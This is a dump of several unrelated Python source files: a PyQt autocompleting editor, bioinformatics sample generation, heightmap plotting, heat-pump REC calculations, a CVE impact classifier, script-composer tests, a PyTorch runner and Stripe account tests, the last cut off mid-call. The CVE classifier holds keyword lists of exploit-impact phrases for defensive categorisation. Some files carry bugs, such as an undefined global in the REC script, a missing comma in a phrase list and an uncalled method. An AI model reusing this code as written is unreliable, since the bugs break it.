text stringlengths 957 885k |
|---|
<reponame>gulshalla/shalla-text-editor<filename>extensions/custom_text_edit.py
import sys
from PyQt5 import QtWidgets, QtPrintSupport, QtGui, QtCore
from PyQt5.QtCore import Qt
class MyTextEdit(QtWidgets.QTextEdit):
def __init__(self, parent = None):
#*args to set parent
QtWidgets.QLineEdit.__init__(self, parent)
font=QtGui.QFont()
font.setPointSize(12)
self.setFont(font)
self.parent = parent
self.completer = None
self.prev_word = []
def setCompleter(self, completer):
if self.completer:
self.completer.insertText.disconnect()
if not completer:
return
completer.setWidget(self)
completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)
completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.completer = completer
self.completer.insertText.connect(self.insertCompletion)
def insertCompletion(self, completion):
tc = self.textCursor()
extra = (len(completion) -
len(self.completer.completionPrefix()))
tc.movePosition(QtGui.QTextCursor.Left)
tc.movePosition(QtGui.QTextCursor.EndOfWord)
tc.insertText(completion[-extra:])
self.setTextCursor(tc)
def textUnderCursor(self):
tc = self.textCursor()
tc.select(QtGui.QTextCursor.WordUnderCursor)
return tc.selectedText()
def focusInEvent(self, event):
if self.completer:
self.completer.setWidget(self);
QtWidgets.QTextEdit.focusInEvent(self, event)
def keyPressEvent(self, event):
# add previous word to trie if space is pressed
if event.text().isalpha(): self.prev_word.append(event.text())
if event.key() == QtCore.Qt.Key_Backspace:
if self.prev_word: self.prev_word.pop()
if event.text() == ' ':
self.parent.local_trie.insert(''.join(self.prev_word))
self.prev_word = []
if self.completer and self.completer.popup() and self.completer.popup().isVisible():
if event.key() in (
QtCore.Qt.Key_Enter,
QtCore.Qt.Key_Return,
QtCore.Qt.Key_Escape,
QtCore.Qt.Key_Tab,
QtCore.Qt.Key_Backtab,
QtCore.Qt.Key_Space):
event.ignore()
return
## has ctrl-Space been pressed??
isShortcut = (event.modifiers() == QtCore.Qt.ControlModifier and event.key() == QtCore.Qt.Key_Space)
## modifier to complete suggestion inline ctrl-e
inline = (event.modifiers() == QtCore.Qt.ControlModifier and event.key() == QtCore.Qt.Key_E)
## if inline completion has been chosen
if inline or isShortcut:
#self.completer = None
words = self.parent.local_trie.get_words(self.textUnderCursor())
completer_new = MyDictionaryCompleter(words)
self.setCompleter(completer_new)
if inline:
# set completion mode as inline
self.completer.setCompletionMode(QtWidgets.QCompleter.InlineCompletion)
completionPrefix = self.textUnderCursor()
if (completionPrefix != self.completer.completionPrefix()):
self.completer.setCompletionPrefix(completionPrefix)
self.completer.complete()
# set the current suggestion in the text box
self.completer.insertText.emit(self.completer.currentCompletion())
# reset the completion mode
self.completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)
return
if (not self.completer or not isShortcut):
pass
QtWidgets.QTextEdit.keyPressEvent(self, event)
ctrlOrShift = event.modifiers() in (QtCore.Qt.ControlModifier ,QtCore.Qt.ShiftModifier)
if ctrlOrShift and event.text()== '':
return
eow = "~!@#$%^&*+{}|:\"<>?,./;'[]\\-=" #end of word
hasModifier = ((event.modifiers() != QtCore.Qt.NoModifier) and not ctrlOrShift)
completionPrefix = self.textUnderCursor()
if not isShortcut :
if self.completer.popup():
self.completer.popup().hide()
return
self.completer.setCompletionPrefix(completionPrefix)
popup = self.completer.popup()
popup.setCurrentIndex(
self.completer.completionModel().index(0,0))
cr = self.cursorRect()
cr.setWidth(self.completer.popup().sizeHintForColumn(0)
+ self.completer.popup().verticalScrollBar().sizeHint().width())
self.completer.complete(cr) ## popup it up!
class MyDictionaryCompleter(QtWidgets.QCompleter):
insertText = QtCore.pyqtSignal(str)
def __init__(self, myKeywords=None):
QtWidgets.QCompleter.__init__(self, myKeywords)
self.activated.connect(self.changeCompletion)
def changeCompletion(self, completion):
#print(completion)
if completion.find("(") != -1:
completion = completion[:completion.find("(")]
#print(completion)
self.insertText.emit(completion)
|
<reponame>JenkoB/resolwe-bio
""".. Ignore pydocstyle D400.
================
Generate Samples
================
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import csv
import gzip
import json
import logging
import os
import random
import shutil
import string
import zipfile
import datetime
from django.core.management.base import BaseCommand
from django.conf import settings
from django.utils import timezone
from resolwe.flow.models import Data, Storage
from resolwe.utils import BraceMessage as __
from resolwe_bio.models import Sample
from .utils import (get_descriptorschema, get_process, get_superuser,
generate_sample_desciptor, generate_reads_descriptor)
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class Command(BaseCommand):
"""Generate test data."""
help = "Generate test data"
def add_arguments(self, parser):
"""Command arguments."""
parser.add_argument('-s', '--n-samples', type=int, default=15,
help="Number of samples to generate (default: %(default)s)")
parser.add_argument('-p', '--n-presamples', type=int, default=5,
help="Number of presamples to generate (default: %(default)s)")
parser.add_argument('--rseed', action='store_true', help="Use fixed random seed")
@staticmethod
def get_random_word(length):
"""Generate a random word."""
return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
def set_name(self):
"""Set sample name."""
organism = random.choice(['Dictyostelium discoideum', 'Mus musculus', 'Homo sapiens'])
replicate = random.choice(['rep1', 'rep2', 'rep3', 'rep4', 'rep5'])
hour = random.choice(range(36))
kit = random.choice(['RiboZero', 'Nugen'])
group = random.choice(['treatment', 'control'])
if organism == 'Dictyostelium discoideum':
return 'Dd_{}_{}_hr_{}'.format(kit, replicate, hour)
if organism == 'Mus musculus':
return 'Mm_{}_{}_{}'.format(self.get_random_word(3), group, replicate)
if organism == 'Homo sapiens':
return 'Hs_{}_{}_{}'.format(self.get_random_word(3), group, replicate)
def set_source(self, species):
"""Set Gene ID source."""
if species.startswith('Dd'):
return 'DICTYBASE'
if species.startswith('Mm'):
return 'UCSC'
if species.startswith('Hs'):
return 'UCSC'
@staticmethod
def generate_expressions(gene_ids, path):
"""Generate random expression data."""
genes = {}
with gzip.open(os.path.join(path, 'expressions.tab.gz'), mode='wt') as f:
# NOTE: Default line terminator is '\r\n'
# NOTE: Python2's csv module doesn't accept a unicode string for delimeter
csvwriter = csv.writer(f, delimiter=str('\t'), lineterminator='\n')
csvwriter.writerow(('Gene', 'Expression'))
with gzip.open(gene_ids, mode='rt') as gene_ids:
all_genes = [line.strip() for line in gene_ids]
for gene in all_genes:
expression = round(random.gammavariate(1, 100), 2)
csvwriter.writerow((gene, expression))
genes[gene] = expression
with open(os.path.join(path, 'expressions.json'), 'w') as json_file:
json.dump({'genes': genes}, json_file, indent=4, sort_keys=True)
def create_data(self, reads_name='seq_reads', annotated=False, rseed=None):
"""Generate sample data."""
# get test data paths
data_dir = settings.FLOW_EXECUTOR['DATA_DIR']
test_files_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'files'))
reads = os.path.join(test_files_path, reads_name + '.fastq.gz')
fastqc = os.path.join(test_files_path, reads_name + '_fastqc.zip')
bam_mapping = os.path.join(test_files_path, 'alignment_position_sorted.bam')
bai = os.path.join(test_files_path, 'alignment_position_sorted.bam.bai')
dicty_genes = os.path.join(test_files_path, 'dicty_genes.tab.gz')
human_genes = os.path.join(test_files_path, 'human_genes.tab.gz')
mouse_genes = os.path.join(test_files_path, 'mouse_genes.tab.gz')
# Create reads data object
started = timezone.now()
data_name = self.set_name()
d = Data.objects.create(
slug='gs-reads',
name=data_name,
started=started,
finished=started + datetime.timedelta(minutes=45),
descriptor_schema=get_descriptorschema('reads'),
descriptor=generate_reads_descriptor(data_name, presample=True),
status=Data.STATUS_PROCESSING,
process=get_process('upload-fastq-single'),
contributor=get_superuser(),
input={'src': [{'file': os.path.basename(reads)}]})
# Create data directory and copy reads files into it
os.mkdir(os.path.join(data_dir, str(d.id)))
shutil.copy(reads, os.path.join(data_dir, str(d.id)))
# Attach FastQC data to reads file
os.mkdir(os.path.join(data_dir, str(d.id), 'fastqc'))
shutil.copy(fastqc, os.path.join(data_dir, str(d.id)))
with zipfile.ZipFile(fastqc) as f:
f.extractall(os.path.join(data_dir, str(d.id), 'fastqc'))
d.output = {
'fastq': [{'file': os.path.basename(reads)}],
'fastqc_url': [{
'file': 'fastqc/{}_fastqc/fastqc_report.html'.format(reads_name),
'refs': ['fastqc/{}_fastqc'.format(reads_name)]}],
'fastqc_archive': [{'file': '{}_fastqc.zip'.format(reads_name)}]}
d.status = Data.STATUS_DONE
d.save()
# Create stdout file
with open(os.path.join(data_dir, str(d.id), 'stdout.txt'), 'w') as stdout:
stdout.write('Upload NGS reads. Sample was created with the generate_samples django-admin command.')
# Get sample collection
sample = Sample.objects.filter(data=d)[0]
# Upload bam file
bam = Data.objects.create(
name='Mapping',
started=started,
finished=started + datetime.timedelta(minutes=50),
process=get_process('upload-bam-indexed'),
contributor=get_superuser(),
status=Data.STATUS_PROCESSING,
input={
'src': {'file': 'alignment_position_sorted.bam'},
'src2': {'file': 'alignment_position_sorted.bam.bai'}})
os.mkdir(os.path.join(data_dir, str(bam.id)))
shutil.copy(bam_mapping, os.path.join(data_dir, str(bam.id)))
shutil.copy(bai, os.path.join(data_dir, str(bam.id)))
bam.output = {
'bam': {'file': 'alignment_position_sorted.bam'},
'bai': {'file': 'alignment_position_sorted.bam.bai'}}
bam.status = Data.STATUS_DONE
bam.save()
with open(os.path.join(data_dir, str(bam.id), 'stdout.txt'), 'w') as stdout:
stdout.write('Upload BAM and BAM index (BAI) files. Sample '
'was created with the generate_samples django-admin command.')
Sample.objects.filter(data=bam).delete()
sample.data.add(bam)
# Create expressios
exp = Data.objects.create(
name='Expression',
process=get_process(slug='upload-expression'),
contributor=get_superuser(),
started=started,
finished=started + datetime.timedelta(minutes=60),
status=Data.STATUS_PROCESSING,
input={'exp': {'file': 'expressions.tab.gz'},
'exp_type': 'FPKM',
'exp_name': 'Expression',
'source': self.set_source(d.name)})
os.mkdir(os.path.join(data_dir, str(exp.id)))
if d.name.startswith('Dd'):
self.generate_expressions(dicty_genes, os.path.join(data_dir, str(exp.id)))
if d.name.startswith('Hs'):
self.generate_expressions(human_genes, os.path.join(data_dir, str(exp.id)))
if d.name.startswith('Mm'):
self.generate_expressions(mouse_genes, os.path.join(data_dir, str(exp.id)))
json_object = Storage.objects.create(
json=json.load(open(os.path.join(data_dir, str(exp.id), 'expressions.json'))),
contributor=get_superuser(),
name='{}_storage'.format(exp.name),
data=exp)
exp.output = {
'exp': {'file': 'expressions.tab.gz'},
'exp_type': 'FPKM',
'exp_json': json_object.id,
'source': self.set_source(d.name)
}
exp.status = Data.STATUS_DONE
exp.save()
Sample.objects.filter(data=exp).delete()
sample.data.add(exp)
with open(os.path.join(data_dir, str(exp.id), 'stdout.txt'), 'w') as stdout:
stdout.write('Upload gene expressions. Sample was created '
'with the generate_samples django-admin command.')
# Annotate Sample Collection
if annotated:
sample.descriptor = generate_sample_desciptor(d.name)
sample.presample = False
sample.save()
d.descriptor = generate_reads_descriptor(data_name, presample=False)
d.save()
logger.info(__('Created sample: {} (id={})', sample.name, sample.id))
else:
logger.info(__('Created presample: {} (id={})', sample.name, sample.id))
def handle(self, *args, **options):
"""Command handle."""
if options['rseed']:
random.seed(42)
for _ in range(options['n_samples']):
self.create_data(annotated=True)
for _ in range(options['n_presamples']):
self.create_data(annotated=False)
|
<gh_stars>1-10
# -*- encoding: utf-8 -*-
#
# heightmap.py
#
# Copyright 2017 <NAME> <<EMAIL>>
#
# This program is the property of Anasys Instruments, and may not be
# redistributed or modified without explict permission of the author.
import xml.etree.ElementTree as ET
import numpy as np
import matplotlib
matplotlib.use("TkAgg") #Keeps tk from crashing on final dialog open
import matplotlib.pyplot as plt
import tkinter as tk
from tkinter import filedialog
from . import anasysfile
class HeightMap(anasysfile.AnasysElement):
"""A data structure for holding HeightMap data"""
def __init__(self, heightmap):
# self._parent = parent
self._iterable_write = {}
self._special_write = {'Tags': self._write_tags}
self._skip_on_write = []
self._special_read = {'Tags': self._read_tags}
anasysfile.AnasysElement.__init__(self, etree=heightmap)
#Rearrange data into correct array size
self.SampleBase64 = self.SampleBase64.reshape(int(self.Resolution.X), int(self.Resolution.Y))
def _write_tags(self, elem, nom, tags):
new_elem = ET.SubElement(elem, nom)
for k, v in tags.items():
tag = ET.SubElement(new_elem, "Tag")
tag.set("Name", k)
tag.set("Value", v)
def _read_tags(self, element):
"""Turn tags into a dict of dicts"""
tag_dict = {}
for tag in list(element):
tag_dict[tag.get('Name')] = tag.get('Value')
return tag_dict
# def _tags_to_etree(self, tags_obj):
# """Converts tags back to xml"""
# root = ET.Element("Tags")
# for k, v in tags_obj:
# sub = ET.SubElement(root, "Tag")
# sub.set("Name", k)
# sub.set("Value", v)
# return root
def _plot(self, **kwargs):
"""Generates a pyplot image of height map for saving or viewing"""
axes = [0, float(self.Size.X), 0, float(self.Size.Y)]
#Set color bar range to [-y, +y] where y is abs(max(minval, maxval)) rounded up to the nearest 5
if self.ZMax == 'INF':
_max = np.absolute(self.SampleBase64).max()
rmax = (_max // 5)*5 + 5
else:
rmax = float(self.ZMax)/2
imshow_args = {'cmap':'gray', 'interpolation':'none', 'extent':axes, 'vmin':-rmax, 'vmax':rmax}
imshow_args.update(kwargs)
# configure style if specified
if "style" in imshow_args.keys():
plt.style.use(imshow_args.pop("style"))
#Clear and display height image
plt.gcf().clear()
img = plt.imshow(self.SampleBase64, **imshow_args)
#Set titles
plt.xlabel('μm')
plt.ylabel('μm')
#Adds color bar with units displayed
units = self.Units
if self.UnitPrefix != {}:
units = self.UnitPrefix + self.Units
x = plt.colorbar().set_label(units)
#Set window title
plt.gcf().canvas.set_window_title(self.Label)
return plt
def show(self, **kwargs):
"""
Opens an mpl gui window with image data. Options are documented:
https://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.imshow
Style can be specified with 'style' flag. Options:
pyplot.style.options:
https://tonysyu.github.io/raw_content/matplotlib-style-gallery/gallery.html
"""
if type(self.SampleBase64) == dict:
#Don't do anything if list is empty
print("Error: No image data in HeightMap object")
return
#Do all the plotting
img = self._plot(**kwargs)
#Display image
img.show()
def savefig(self, fname='', **kwargs):
"""
Gets the plot from self._plot(), then saves. Options are documented:
https://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.savefig
"""
if type(self.SampleBase64) == dict:
#Don't do anything if list is empty
print("Error: No image data in HeightMap object")
return
#Do all the plotting
img = self._plot()
#File types for save
ftypes = (("Portable Network Graphics (*.png)", "*.png"),
("Portable Document Format(*.pdf)", "*.pdf"),
("Encapsulated Postscript (*.eps)", "*.eps"),
("Postscript (*.ps)", "*.pdf"),
("Raw RGBA Bitmap (*.raw;*.rgba)", "*.raw;*.rgba"),
("Scalable Vector Graphics (*.svg;*.svgz)", "*.svg;*.svgz"),
("All files", "*.*"))
#Test for presense of filename and get one if needed
if fname == '':
fname = tk.filedialog.asksaveasfilename(filetypes=ftypes, defaultextension=".png", initialfile="HeightMap.png")
if fname == '':
print("ERROR: User failed to provide filename. Abort save command.")
return
#If they made it this far, save (fname given)
plt.savefig(fname, **kwargs)
|
<filename>analysis/geoexchange_proxies.py
import admin_tools.db_reader as db_reader
import datetime
import pandas as pd
def C_to_F(C):
F = (9. / 5) *C + 32.
return F
def rec_calc_prep(df):
df.loc[:, 'ewt'] = C_to_F(df.loc[:, 'ewt_1'])
df.loc[:, 'lwt'] = C_to_F(df.loc[:, 'lwt_1'])
df.loc[:, 'delT'] = df.loc[:, 'ewt'] - df.loc[:, 'lwt']
data_heating = df.loc[data.delT > 1]
data_running = data_heating[data_heating.compressor_1 > 500]
data_final = data_running[data_running.time_elapsed < 0.08333]
data_final.loc[:, 'heat_MWh'] = (500 * data_final.loc[:, 'delT']
* data_final.loc[:, 'q_1_device']
* data_final.loc[:, 'time_elapsed']
* 2.93E-07)
return data_final
def ma_thermal_recs(data, ma_hp_params):
data_ma = pd.DataFrame()
a = ma_hp_params['COP-ewt'][0]
b = ma_hp_params['COP-ewt'][1]
c = ma_hp_params['COP-ewt'][2]
# Calculate table look up of COP based on EWT'
data.loc[:, 'COPewt'] = a * data.loc[:, 'ewt'] * data.loc[:, 'ewt'] + b * data.loc[:, 'ewt'] + c
data.loc[:, 'kW'] = data.loc[:, 'compressor_1'] /1000. * ma_hp_params['kw_bias'] - ma_hp_params['circ-pump-kw']
data_ma.loc[:, 'RH'] = (data.loc[:, 'COPewt'] - 1) * data.loc[:, 'kW'] * data.loc[:, 'time_elapsed']
#conversion to MWh
return data_ma/1000.
def nh_thermal_recs(data, heatpump_AHRI):
data_nh = pd.DataFrame()
data_nh.loc[:, 'nh_rec'] = (data.loc[:, 'time_elapsed']
* heatpump_AHRI['hc_part_load'] * (heatpump_AHRI['cop']-1.)/heatpump_AHRI['cop'])
#conversion to MWh
return data_nh*2.93E-07
if __name__ == '__main__':
installs = {'1649': 'none'}
start = datetime.datetime(2016, 1, 1)
stop = datetime.datetime(2016, 12, 31)
# Hardwired for specific heat pump
nh_heatpump_AHRI = {'install_id': '1649', 'model': 'HXT036', 'cop': 4.9, 'hc_part_load': 22600, 'hc_full_load': 28600}
#nh_heatpump_AHRI = {'install_id': '45', 'model': 'HXT048', 'cop': 4.3, 'hc_part_load': 29700, 'hc_full_load':33700}
# nh_heatpump_AHRI = {'install_id': '1674', 'model': 'NDH038', 'cop': 4.8, 'hc_part_load': 22900, 'hc_full_load': 28500}
#nh_heatpump_AHRI = {'install_id': '1660', 'model': 'NDV072', 'cop': 3.9, 'hc_part_load': 47400, 'hc_full_load': 55400}
ma_hp_parameters = {'install_id': '1649', 'COP-ewt': [-0.0013, 0.1361, 0.619], 'circ-pump-kw': 0.2, 'kw_bias': 1.15}
#ma_hp_parameters = {'install_id': '45', 'COP-ewt': [-0.0003, 0.0758, 1.498] , 'circ-pump-kw': 0.4, 'kw_bias': 1.00}
# ma_hp_parameters = {'install_id': '1674', 'COP-ewt': [0.00, 0.05, 2.2], 'circ-pump-kw': 0.2, 'kw_bias': 1.00}
#ma_hp_parameters = {'install_id': '1660', 'COP-ewt': [0.0003, 0.0154, 2.586], 'circ-pump-kw': 0.0, 'kw_bias': 1.15}
db_columns = 'ewt_1, lwt_1, compressor_1, created, q_1_device, auxiliary_1, time_elapsed'
for install, hp_uuid in installs.items():
print('Working on ..geoexchange proxies.. ', install)
data = db_reader.get_fr_as_dataframe(install, start, stop, db_columns)
data.sort_values('created', inplace=True)
df = rec_calc_prep(data)
nh_recs = nh_thermal_recs(df, nh_heatpump_AHRI)
ma_recs = ma_thermal_recs(df, ma_hp_parameters)
results = {'NH RECs': nh_recs.sum(),
'MA AECs': ma_recs.sum(),
'Measured': df.heat_MWh.sum()}
if __name__ == '__main__':
installation_id = 'GES649'
start_date = '2015-01-01'
end_date = '2016-01-01'
start = datetime.datetime(2016, 1, 1)
stop = datetime.datetime(2016, 12, 30) |
"""
Module contains functionality that determines whether a vulnerability
causes remote code execution.
"""
from cve_connector.nvd_cve.categorization.helpers import test_incidence
def has_code_execution_as_root(description, cvssv2, cvssv3):
"""
Function determines whether CVE has "Arbitrary code execution as
root/administrator/system" as its impact.
:param description: description of CVE
:param cvssv2: CVSS version 2 of CVE
:param cvssv3: CVSS version 3 of CVE
:return: True if CVE has "Arbitrary code execution as
root/administrator/system" as its impact
"""
necessary_condition = [
"execute arbitrary code as root",
"execute arbitrary code with root privileges",
"execute arbitrary code as the root user",
"execute arbitrary code as a root user",
"execute arbitrary code as LocalSystem",
"execute arbitrary code as SYSTEM",
"execute arbitrary code as Local System"
"execute arbitrary code with SYSTEM privileges",
"execute arbitrary code with LocalSystem privileges",
"execute dangerous commands as root",
"execute shell commands as the root user",
"execute arbitrary commands as root",
"execute arbitrary commands with root privileges",
"execute arbitrary commands with root-level privileges",
"execute commands as root",
"execute root commands",
"execute arbitrary os commands as root",
"execute arbitrary shell commands as root",
"execute arbitrary commands as SYSTEM",
"execute arbitrary commands with SYSTEM privileges",
"run commands as root",
"run arbitrary commands as root",
"run arbitrary commands as the root user",
"execute code with root privileges",
"run commands as root",
"load malicious firmware",
"succeed in uploading malicious Firmware",
"executed under the SYSTEM account"
]
for phrase in necessary_condition:
if phrase in description:
return True
return has_code_execution_as_user(description.lower(),
cvssv3) and \
(cvssv2['c'] == "COMPLETE") and \
(cvssv2['i'] == "COMPLETE") and \
(cvssv2['a'] == "COMPLETE")
def has_code_execution_as_user(description, cvssv3):
"""
Function determines whether particular CVE has "Arbitrary code execution
as user of application" as its impact.
:param description: description of CVE
:param cvssv3: CVSS version 3 of CVE
:return: True if CVE has "Arbitrary code execution as user of application"
as its impact.
"""
necessary_condition = [
"include and execute arbitrary local php files",
"execute arbitrary code",
"command injection",
"execute files",
"run arbitrary code",
"execute a malicious file",
"execution of arbitrary code",
"remote execution of arbitrary php code",
"execute code",
"code injection vulnerability",
"execute any code",
"malicious file could be then executed on the affected system",
"inject arbitrary commands",
"execute arbitrary files",
"inject arbitrary sql code",
"run the setuid executable",
"vbscript injection",
"execute administrative operations",
"performs arbitrary actions",
"submit arbitrary requests to an affected device",
"perform arbitrary actions on an affected device",
"executes an arbitrary program",
"attacker can upload a malicious payload",
"execute malicious code",
"modify sql commands to the portal server",
"execute arbitrary os commands",
"execute arbitrary code with administrator privileges",
"execute administrator commands",
"executed with administrator privileges",
"remote procedure calls on the affected system",
"run a specially crafted application on a targeted system",
"execute arbitrary code in a privileged context",
"execute arbitrary code with super-user privileges",
"run processes in an elevated context",
]
for phrase in necessary_condition:
if phrase in description:
return True
# searching for such an injection vulnerability that changes integrity and
# confidentiality
if "sql injection" in description and \
cvssv3['i'] == "HIGH" and \
cvssv3['c'] == "HIGH" and \
"blind sql injection" not in description:
return True
required_verbs = [
" execut",
" run ",
' inject'
]
required_nouns = [
" code ",
" command",
"arbitrary script",
" code."
]
if test_incidence(description, required_nouns) and \
test_incidence(description, required_verbs):
return True
return False
|
<filename>test/tests/scriptComposer_tests.py
import grp, os, pwd, stat, sys, unittest
from pathlib import Path
from collections import OrderedDict
from pavilion import scriptcomposer
from pavilion.unittest import PavTestCase
from pavilion import utils
class TestScriptWriter(PavTestCase):
script_path = 'testName.batch'
def setUp(self):
"""Set up for the ScriptComposer tests."""
if os.path.exists(self.script_path):
os.remove(self.script_path)
def _other_group(self):
"""Find a group other than the user's default group to use when creating files.
:returns: The name of the found group."""
for gid in os.getgroups():
if gid == os.getgid():
# This is the user's default.
continue
return grp.getgrgid(gid).gr_name
raise RuntimeError("Could not find suitable group for use in test.")
def test_header(self):
"""Test for the ScriptHeader class."""
header = scriptcomposer.ScriptHeader(
shebang="#!/bin/sh",
scheduler_headers=[
'# FOO',
'# BAR',
]
)
self.assertEqual(header.get_lines(),
['#!/bin/sh',
'# FOO',
'# BAR'])
def test_scriptComposer(self):
"""Testing ScriptComposer class variable setting."""
# Testing valid uses.
# Testing initialization defaults.
composer = scriptcomposer.ScriptComposer()
self.assertEqual(composer.header.shebang, '#!/bin/bash')
self.assertEqual(composer.header.scheduler_headers, [])
# Testing individual assignment
test_header_shell = "/usr/env/python"
test_header_scheduler = OrderedDict()
test_header_scheduler['-G'] = 'pam'
test_header_scheduler['-N'] = 'fam'
composer.newline()
composer.command(['taco', 'burrito', 'nachos'])
test_details_path = 'testPath'
test_details_group = 'groupies'
test_details_perms = 0o543
composer.header.shebang = test_header_shell
composer.header.scheduler_headers = test_header_scheduler
self.assertEqual(composer.header.shebang, test_header_shell)
self.assertEqual(composer.header.scheduler_headers,
test_header_scheduler)
composer = scriptcomposer.ScriptComposer()
self.assertEqual(composer.header.shebang, '#!/bin/bash')
self.assertEqual(composer.header.scheduler_headers, [])
# Testing object assignment.
header = scriptcomposer.ScriptHeader(
shebang=test_header_shell,
scheduler_headers=test_header_scheduler)
composer.header = header
self.assertEqual(composer.header.shebang, test_header_shell)
self.assertEqual(composer.header.scheduler_headers,
test_header_scheduler)
def test_writeScript(self):
"""Testing the writeScript function of the ScriptComposer class."""
testHeaderShell = "/usr/env/python"
testHeaderScheduler = ['-G pam', '-N fam']
path = self.pav_cfg.working_dir/'testPath'
testComposer = scriptcomposer.ScriptComposer()
testComposer.header.shebang = testHeaderShell
testComposer.header.scheduler_headers = testHeaderScheduler
testComposer.write(path)
self.assertTrue(path.exists())
with path.open() as testFile:
testLines = testFile.readlines()
for i in range(0, len(testLines)):
testLines[i] = testLines[i].strip()
self.assertEqual(testLines[0], "#!/usr/env/python")
self.assertEqual(testLines[1], "# -G pam")
self.assertEqual(testLines[2], "# -N fam")
self.assertEqual(testLines[3], "")
self.assertEqual(testLines[4], "")
self.assertEqual(len(testLines), 5)
testStat = path.stat()
umask = os.umask(0)
os.umask(umask)
# Default file permissions.
expectedStat = (0o100666 & ~umask) | stat.S_IXGRP | stat.S_IXUSR
self.assertEqual(oct(testStat.st_mode), oct(expectedStat))
path.unlink()
|
import time
import torch
import numpy as np
from torch import nn
from torch.utils import data as torchData
import sys
from SimpleDataset import SimpleDataset
from SimpleAutoDataset import SimpleAutoDataset
import torch.nn.functional as F
from NetworkRunner import NetworkRunner
#Network runner that Collates X values without touching them, for data that is variable length
class NetworkRunnerCollate(NetworkRunner):
def __init__(self,net,batch_size=256,deviceType=None,lr=1e-2,optType='Adam',weight_decay=0,sched_factor=0.1,sched_patience=1,sched_cooldown=0,sched_thresh=1e-2,predictSoftmax=True,hyp={}):
NetworkRunner.__init__(self,net,batch_size,deviceType,lr,optType,weight_decay,sched_factor,sched_patience,sched_cooldown,sched_thresh,predictSoftmax,hyp)
def getLoaderArgs(self,shuffle=True, pinMem=False):
d = super().getLoaderArgs(shuffle,pinMem)
d['collate_fn'] = self.collate
return d
#same as regular train, but doesn't move data to device
def train_epoch(self):
self.net.train()
self.criterion = self.criterion.to(self.deviceType)
running_loss = 0
start_time = time.time()
totalPairs = 0
for batch_idx, (data, classData) in enumerate(self.curLoader):
self.optimizer.zero_grad()
#data = data.to(self.deviceType)
classData = classData.to(self.deviceType)
out = self.net.forward(data)
loss = self.getLoss(out,classData)
running_loss += loss.item()*classData.shape[0]
totalPairs += classData.shape[0]
# backprop loss
loss.backward()
self.optimizer.step()
end_time = time.time()
running_loss /= totalPairs
self.epoch += 1
print('Epoch ',self.epoch, 'Train Loss: ', running_loss, 'LR', self.getLr(),'Time: ',end_time - start_time, 's')
return running_loss
#same as regular predict, but doesn't move data to device
def predictFromLoader(self,loader):
outputsLst = []
runningLoss = 0
totalPairs = 0
self.criterion = self.criterion.to(self.deviceType)
with torch.no_grad():
self.net.eval()
for batch_idx, (data, classData) in enumerate(loader):
# data = data.to(self.deviceType)
outputs = self.net(data)
if classData[0]!= -1:
classData = classData.to(self.deviceType)
loss = self.getLoss(outputs,classData).detach().item()
else:
loss = -1
outputs = self.processPredictions(outputs)
runningLoss += loss*outputs.shape[0]
totalPairs += outputs.shape[0]
outputs = outputs.to('cpu').detach().numpy()
outputsLst.append(outputs)
runningLoss /= totalPairs
outputsLst = np.vstack(outputsLst)
return (outputsLst,runningLoss)
def predictWithIndvLossFromLoader(self,loader):
outputsLst = []
lossVals = []
totalPairs = 0
curRed = self.criterion.reduction
#switch criterion to not reduce, to get per element losses
self.criterion.reduction='none'
self.criterion = self.criterion.to(self.deviceType)
with torch.no_grad():
self.net.eval()
for batch_idx, (data, classData) in enumerate(loader):
#data = data.to(self.deviceType)
outputs = self.net(data)
if classData[0]!= -1:
classData = classData.to(self.deviceType)
loss = self.getLoss(outputs,classData).detach().tolist()
else:
loss = [-1]*data.shape[0] #just append -1 for each loss
lossVals.extend(loss)
totalPairs += data.shape[0]
outputs = self.processPredictions(outputs)
outputs = outputs.to('cpu').detach().numpy()
outputsLst.append(outputs)
outputsLst = np.vstack(outputsLst)
self.criterion.reduction=curRed
return (outputsLst,lossVals)
def predictWithInvLoss(self,predictDataset):
predictLoader = torchData.DataLoader(predictDataset,**self.getLoaderArgs(False,False))
return self.predictWithIndvLossFromLoader
def collate(self,tuples):
lst = []
lst[:] = zip(*tuples)
classes = lst[-1]
lst = lst[:-1]
for i in range(0,len(lst)):
lst[i] = torch.vstack(lst[i]).to(self.deviceType)
classes = torch.vstack(classes).squeeze(1)
return (lst,classes)
|
<reponame>colehertz/Stripe-Tester
import stripe
from stripe.test.helper import StripeResourceTest
class AccountTest(StripeResourceTest):
def test_retrieve_account_deprecated(self):
stripe.Account.retrieve()
self.requestor_mock.request.assert_called_with(
'get',
'/v1/account',
{},
None
)
def test_retrieve_account(self):
stripe.Account.retrieve('acct_foo')
self.requestor_mock.request.assert_called_with(
'get',
'/v1/accounts/acct_foo',
{},
None
)
def test_list_accounts(self):
stripe.Account.list()
self.requestor_mock.request.assert_called_with(
'get',
'/v1/accounts',
{}
)
def test_create_account(self):
pii = {
'type': 'individual',
'first_name': 'Joe',
'last_name': 'Smith',
}
stripe.Account.create(legal_entity=pii)
self.requestor_mock.request.assert_called_with(
'post',
'/v1/accounts',
{
'legal_entity': pii,
},
None,
)
def test_update_account(self):
acct = stripe.Account.construct_from({
'id': 'acct_update',
'legal_entity': {'first_name': 'Joe'},
}, 'api_key')
acct.legal_entity['first_name'] = 'Bob'
acct.save()
self.requestor_mock.request.assert_called_with(
'post',
'/v1/accounts/acct_update',
{
'legal_entity': {
'first_name': 'Bob',
},
},
None,
)
def test_account_delete_bank_account(self):
source = stripe.BankAccount.construct_from({
'account': 'acc_delete_ba',
'id': 'ba_delete_ba',
}, 'api_key')
source.delete()
self.requestor_mock.request.assert_called_with(
'delete',
'/v1/accounts/acc_delete_ba/external_accounts/ba_delete_ba',
{},
None
)
def test_reject_account(self):
self.mock_response({
'id': 'acct_reject',
'verification': {
'disabled_reason': 'rejected.fraud'
},
})
obj = stripe.Account.construct_from({
'id': 'acct_reject'
}, 'mykey')
self.assertTrue(obj is obj.reject(reason='fraud'))
self.assertEqual('rejected.fraud', obj.verification['disabled_reason'])
self.assertEqual('acct_reject', obj.id)
self.requestor_mock.request.assert_called_with(
'post',
'/v1/accounts/acct_reject/reject',
